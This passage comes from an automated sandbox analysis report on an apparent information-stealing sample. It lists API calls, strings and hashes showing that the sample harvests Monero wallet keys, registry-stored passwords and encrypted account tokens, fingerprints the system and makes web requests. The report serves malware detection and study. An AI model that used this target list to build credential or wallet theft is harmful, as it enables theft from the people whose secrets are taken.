                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                • API String ID: 3478931302-218353709
                                • Opcode ID: 42326dc2b0b28400169b6cfb0e85ab546093b9df450a38d799bf063f7799e2fb
                                • Instruction ID: cdc48a6f818ad97ac98349a66d55bb3bd54c7a6a1d4e2f2448c1aa7f9571c05a
                                • Opcode Fuzzy Hash: 42326dc2b0b28400169b6cfb0e85ab546093b9df450a38d799bf063f7799e2fb
                                • Instruction Fuzzy Hash: FA5121B195011857CB19EB64DC96FED733CFB54704F4041ACB60AE6181EE70AB8ACAA7
                                APIs
                                  • Part of subcall function 008B72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 008B733A
                                  • Part of subcall function 008B72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 008B73B1
                                  • Part of subcall function 008B72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 008B740D
                                  • Part of subcall function 008B72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 008B7452
                                  • Part of subcall function 008B72D0: HeapFree.KERNEL32(00000000), ref: 008B7459
                                • lstrcat.KERNEL32(00000000,008D17FC), ref: 008B7606
                                • lstrcat.KERNEL32(00000000,00000000), ref: 008B7648
                                • lstrcat.KERNEL32(00000000, : ), ref: 008B765A
                                • lstrcat.KERNEL32(00000000,00000000), ref: 008B768F
                                • lstrcat.KERNEL32(00000000,008D1804), ref: 008B76A0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 008B76D3
                                • lstrcat.KERNEL32(00000000,008D1808), ref: 008B76ED
                                • task.LIBCPMTD ref: 008B76FB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                • String ID: :
                                • API String ID: 2677904052-3653984579
                                • Opcode ID: a65f1f84a72e6c2874d7364abc8ba61025f263bc6755ad91e9fa60fe0f3e791e
                                • Instruction ID: de743cf3ff20f6de020c3c780b6daf1c5ee4c53f4c6189951ad64f6d45c63570
                                • Opcode Fuzzy Hash: a65f1f84a72e6c2874d7364abc8ba61025f263bc6755ad91e9fa60fe0f3e791e
                                • Instruction Fuzzy Hash: 123118B1901209EBCB48EBE8DC99DFE7778FB64341B144118E106EB391DA74A947CB92
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,007BDC08,00000000,?,008D0E2C,00000000,?,00000000), ref: 008C8130
                                • RtlAllocateHeap.NTDLL(00000000), ref: 008C8137
                                • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 008C8158
                                • __aulldiv.LIBCMT ref: 008C8172
                                • __aulldiv.LIBCMT ref: 008C8180
                                • wsprintfA.USER32 ref: 008C81AC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                • String ID: %d MB$@
                                • API String ID: 2774356765-3474575989
                                • Opcode ID: bd3488b34dbd326b6e7cf28c4ee3f95614964c7b7f287caa60aa849a42e78d7d
                                • Instruction ID: d05220539e62380064d1cf51dbfb5f3a747c2ab24839e9a13841823c00f07788
                                • Opcode Fuzzy Hash: bd3488b34dbd326b6e7cf28c4ee3f95614964c7b7f287caa60aa849a42e78d7d
                                • Instruction Fuzzy Hash: 762108B1E44218ABDB00DFD5DC49FAEB7B8FB44B14F104619F615BB280D7B8A9018BA5
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 008B733A
                                • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 008B73B1
                                • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 008B740D
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 008B7452
                                • HeapFree.KERNEL32(00000000), ref: 008B7459
                                • task.LIBCPMTD ref: 008B7555
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$EnumFreeOpenProcessValuetask
                                • String ID: Password
                                • API String ID: 775622407-3434357891
                                • Opcode ID: b88a4b844b1a9b6436157c3028ef2c18608eb4243d193111e28fcd6fb5a8bf72
                                • Instruction ID: 904518035c25f6bb272095e263b09b11a319dc6a7dace01ac952eaaee63911cc
                                • Opcode Fuzzy Hash: b88a4b844b1a9b6436157c3028ef2c18608eb4243d193111e28fcd6fb5a8bf72
                                • Instruction Fuzzy Hash: 57611CB590425C9BDB24DB54CC45BD9B7BCFF48344F0081E9E689A6241DB706BC9CFA1
                                APIs
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                  • Part of subcall function 008CA920: lstrcpy.KERNEL32(00000000,?), ref: 008CA972
                                  • Part of subcall function 008CA920: lstrcat.KERNEL32(00000000), ref: 008CA982
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                  • Part of subcall function 008CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008CA7E6
                                • lstrlen.KERNEL32(00000000), ref: 008BBC9F
                                  • Part of subcall function 008C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 008C8E52
                                • StrStrA.SHLWAPI(00000000,AccountId), ref: 008BBCCD
                                • lstrlen.KERNEL32(00000000), ref: 008BBDA5
                                • lstrlen.KERNEL32(00000000), ref: 008BBDB9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                • API String ID: 3073930149-1079375795
                                • Opcode ID: 84bce80544001ec1fe892fc3ab56b80227583cc61916510f834c1fad944b51d8
                                • Instruction ID: 627f41f51ca3d259cfafe8ad120ca57beacabc09caf1c2fc9a408ea90a1fc747
                                • Opcode Fuzzy Hash: 84bce80544001ec1fe892fc3ab56b80227583cc61916510f834c1fad944b51d8
                                • Instruction Fuzzy Hash: 0FB1FB71910108ABDB18EBA8DD96EEE7738FF54304F40416DF506E6191EF34AA49CBA3
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess$DefaultLangUser
                                • String ID: *
                                • API String ID: 1494266314-163128923
                                • Opcode ID: 4906a8301fd0e2e5cdf2a0713434f1c1fe9583f600b1a15e012c793d15be417b
                                • Instruction ID: 7d4b7a50bd5fb1e1119b1fa1e1f59297c5975465a08d5969cad2e2994cf18e76
                                • Opcode Fuzzy Hash: 4906a8301fd0e2e5cdf2a0713434f1c1fe9583f600b1a15e012c793d15be417b
                                • Instruction Fuzzy Hash: 93F03AB1904209EFD344EFE0A909FBC7B70FB15702F0402A8E609C6290EA705A52DBD6
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,007BD240,00000000,00020119,?), ref: 008C40F4
                                • RegQueryValueExA.ADVAPI32(?,007BDE78,00000000,00000000,00000000,000000FF), ref: 008C4118
                                • RegCloseKey.ADVAPI32(?), ref: 008C4122
                                • lstrcat.KERNEL32(?,00000000), ref: 008C4147
                                • lstrcat.KERNEL32(?,007BDEC0), ref: 008C415B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$CloseOpenQueryValue
                                • String ID: P{
                                • API String ID: 690832082-680765652
                                • Opcode ID: e4bd32d7475958d50dfd70749423c1ec46f33cdf3e6505ad2d884886b27a6f2c
                                • Instruction ID: 1d60bead56c8aa5aabd64a6ac747d38e13df8cbfd1c7d82aefb6c237fa37ac93
                                • Opcode Fuzzy Hash: e4bd32d7475958d50dfd70749423c1ec46f33cdf3e6505ad2d884886b27a6f2c
                                • Instruction Fuzzy Hash: 3D41C8B69001086BDB24EBE0DC56FFD373CF758300F40854CB61996181EA719B89CBA3
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 008B4FCA
                                • RtlAllocateHeap.NTDLL(00000000), ref: 008B4FD1
                                • InternetOpenA.WININET(008D0DDF,00000000,00000000,00000000,00000000), ref: 008B4FEA
                                • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 008B5011
                                • InternetReadFile.WININET(?,?,00000400,00000000), ref: 008B5041
                                • InternetCloseHandle.WININET(?), ref: 008B50B9
                                • InternetCloseHandle.WININET(?), ref: 008B50C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                • String ID:
                                • API String ID: 3066467675-0
                                • Opcode ID: 12e06e79a02ec0059341a183f111cbf89fd07d846a2fba0711cd171ffeef7cc7
                                • Instruction ID: c01b3bcf289352777c429bc2f3a5b90ab0006382eb2c6345dc7aff9e88c5ed31
                                • Opcode Fuzzy Hash: 12e06e79a02ec0059341a183f111cbf89fd07d846a2fba0711cd171ffeef7cc7
                                • Instruction Fuzzy Hash: 5131E7F4A0021CABDB20DF94DC85BDDB7B4FB48704F1081D9E609A7281D7706E868F99
                                APIs
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 008C8426
                                • wsprintfA.USER32 ref: 008C8459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 008C847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 008C848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 008C8499
                                  • Part of subcall function 008CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008CA7E6
                                • RegQueryValueExA.ADVAPI32(00000000,007BDCC8,00000000,000F003F,?,00000400), ref: 008C84EC
                                • lstrlen.KERNEL32(?), ref: 008C8501
                                • RegQueryValueExA.ADVAPI32(00000000,007BDD10,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,008D0B34), ref: 008C8599
                                • RegCloseKey.ADVAPI32(00000000), ref: 008C8608
                                • RegCloseKey.ADVAPI32(00000000), ref: 008C861A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                • String ID: %s\%s
                                • API String ID: 3896182533-4073750446
                                • Opcode ID: 826cd0760dafd0c0a02eec0e58d2d4b2baca6b4b515d19873c1b056e24c4a1d0
                                • Instruction ID: e34dc81abfb5505ac966a4df69987f5323bd167ae220acd66040bdd734fb44a5
                                • Opcode Fuzzy Hash: 826cd0760dafd0c0a02eec0e58d2d4b2baca6b4b515d19873c1b056e24c4a1d0
                                • Instruction Fuzzy Hash: 4E2119B194021CABDB24DB94DC85FE9B3B8FB58704F00C5D9E609A6140DF71AA86CFD4
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008C76A4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 008C76AB
                                • RegOpenKeyExA.ADVAPI32(80000002,007ABB58,00000000,00020119,00000000), ref: 008C76DD
                                • RegQueryValueExA.ADVAPI32(00000000,007BDB48,00000000,00000000,?,000000FF), ref: 008C76FE
                                • RegCloseKey.ADVAPI32(00000000), ref: 008C7708
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: Windows 11
                                • API String ID: 3225020163-2517555085
                                • Opcode ID: 9840f0dd58abba4b8ca8cf159f7017e18068289aac45b4b39ac0ffe70030e47a
                                • Instruction ID: bb63c7ef8842d63651bc1e810cb2ac29a3827a03a401eae917e9b00820af6e36
                                • Opcode Fuzzy Hash: 9840f0dd58abba4b8ca8cf159f7017e18068289aac45b4b39ac0ffe70030e47a
                                • Instruction Fuzzy Hash: BF014FF5A04208BFD700DBE4DC49FB9B7B8EB58701F108158FA09D7290D6B0A905CF91
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008C7734
                                • RtlAllocateHeap.NTDLL(00000000), ref: 008C773B
                                • RegOpenKeyExA.ADVAPI32(80000002,007ABB58,00000000,00020119,008C76B9), ref: 008C775B
                                • RegQueryValueExA.ADVAPI32(008C76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 008C777A
                                • RegCloseKey.ADVAPI32(008C76B9), ref: 008C7784
                                Strings
                                Memory Dump Source
